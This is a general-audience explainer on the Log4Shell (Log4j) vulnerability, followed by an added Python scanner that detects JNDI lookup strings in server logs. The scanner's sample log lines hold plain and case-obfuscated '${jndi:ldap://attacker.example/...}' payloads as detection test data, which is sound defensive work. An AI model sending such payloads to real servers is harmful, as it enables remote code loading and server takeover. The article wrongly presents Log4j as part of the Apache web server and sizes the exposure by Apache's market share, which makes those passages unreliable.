A wave of cyberattacks is exploiting a dangerous flaw, called Log4Shell, in the Log4j software. A senior US cybersecurity official was quoted in Cyberscoop saying that it is one of the most serious attacks of his career, “if not the most serious.” Here is what makes it so bad and how it affects you.
What is Log4j?
The Log4j bug (also called the Log4Shell vulnerability and tracked as CVE-2021-44228) is a weakness in Apache, one of the most widely used pieces of web server software. The bug is in the open source Log4j library, a collection of ready-made commands that programmers use to speed up their work and avoid repeating complicated code.
Libraries are the foundation of many, if not most, programs because they save a lot of time. Instead of writing an entire block of code over and over for certain tasks, you just write a few commands telling the program to take that piece from a library. Think of them as shortcuts you can drop into your code.
However, if something goes wrong in a library, as it has in Log4j, every program that uses that library is affected. That would be serious in itself, but Apache runs on many servers, and we mean many. W3Techs estimates that 31.5 percent of websites use Apache, and BuiltWith claims to know of more than 52 million sites that use it.
How the Log4j glitch works
That is potentially a lot of servers with this flaw, but it gets worse: the Log4j bug works in such a way that a single text string (one line of code) is enough to make the server load data from another computer on the internet.
An average hacker can feed the Log4j library a line of code that instructs the server to fetch data from another server, one owned by the hacker. That data can be anything from a script that collects information on devices connected to the server, such as browser fingerprints, to something far worse, such as code that takes control of the server itself.
The only limit is the hacker's inventiveness; skill hardly comes into play because it is so easy. So far, according to Microsoft, hackers' activities have included cryptocurrency mining, data theft and server hijacking.
This flaw is a zero-day, which means it was discovered and exploited before a patch to fix it was available.
We recommend the Malwarebytes blog post on Log4j if you are interested in more technical details.
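As an added example (not from the original article), here is a small Python scanner over constructed web-server log lines that flags the lookup string the attack depends on, `${jndi:...}`, including the case where it is hidden behind Log4j's own nested `${lower:}`/`${upper:}` lookups. The log lines and the host `attacker.example` are made up for the example.

```python
import re

# Constructed web-server log lines (made up for this example, not real traffic).
# The last quoted field is the client-supplied User-Agent, a typical place
# where a lookup string ends up inside a logged message.
SAMPLE_LOGS = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET /login HTTP/1.1" 200 "${jndi:ldap://attacker.example/a}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 "${${lower:j}ndi:${lower:l}dap://attacker.example/b}"',
    '10.0.0.8 - - [10/Dec/2021:12:00:04 +0000] "GET /docs HTTP/1.1" 200 "curl/7.79.1"',
]

# Log4j resolves ${lower:x} / ${upper:x} inside a message before the JNDI
# lookup runs, so a naive search for "${jndi:" misses the third line above.
NESTED_CASE = re.compile(r"\$\{(lower|upper):([^${}]*)\}", re.IGNORECASE)
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi\s*:", re.IGNORECASE)


def normalize(line: str) -> str:
    """Resolve ${lower:}/${upper:} lookups repeatedly until none remain."""
    def resolve(m: re.Match) -> str:
        text = m.group(2)
        return text.lower() if m.group(1).lower() == "lower" else text.upper()

    prev = None
    while prev != line:
        prev = line
        line = NESTED_CASE.sub(resolve, line)
    return line


def is_suspicious(line: str) -> bool:
    """True if the line, after normalization, contains a JNDI lookup string."""
    return JNDI_LOOKUP.search(normalize(line)) is not None


def scan(lines: list[str]) -> list[int]:
    """Return the indexes of log lines that should be investigated."""
    return [i for i, line in enumerate(lines) if is_suspicious(line)]


if __name__ == "__main__":
    for i in scan(SAMPLE_LOGS):
        print(f"line {i}: {SAMPLE_LOGS[i]}")
```

A hit only means the string reached a log; whether a vulnerable Log4j version actually processed it is the question the breach check in the next section has to answer.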
Security impact of Log4j
The impact of this flaw is massive: a third of the world’s servers are likely to be affected, including those of large corporations like Microsoft, as well as Apple’s iCloud and its 850 million users. The servers of the Steam gaming platform are also affected. Even Amazon has servers that run on Apache.
It’s not just the corporate bottom line that could be affected either – there are many smaller companies running Apache on their servers. The damage a hacker could do to a system is bad enough for a multibillion-dollar company, but a small one could disappear completely.
Also, because the flaw was widely publicized in an effort to get everyone to fix it, it has turned into something of a feeding frenzy. In addition to the usual crypto miners trying to enslave new networks to speed up their operations, Russian and Chinese hackers are also joining in, according to several experts cited in the Financial Times (our apologies for the paywall).
All anyone can do now is create patches that fix the bug and deploy them. However, experts are already saying that it will take years to fully patch all affected systems. Not only do cybersecurity professionals need to find out which systems are affected, they also need to check whether each system has been breached and, if so, what the hackers did.
Even after patching, there is a chance that whatever the hackers left behind will still do its job, meaning the servers will need to be wiped and reinstalled. It is going to be a huge job, and not one that can be done in a day.
How does Log4j affect you?
All of the above may sound like nothing short of a cyber apocalypse, but so far we have only talked about companies, not people, which is also where most of the coverage has focused. However, there is a risk for ordinary people too, even if they are not running a server.
As we mentioned, hackers have stolen data from some servers. If the company in question secured the data correctly, that shouldn’t be a big problem, because the attackers would still have to decrypt the files, which is not an easy task. However, if people’s data was stored incorrectly, then they have made the hackers’ day.
The data in question could really be anything: usernames, passwords, or even your address and internet activity; fortunately, credit card information is generally encrypted. Although it is too early to say how bad it will be, it seems that very few people will be able to avoid the consequences of Log4j entirely.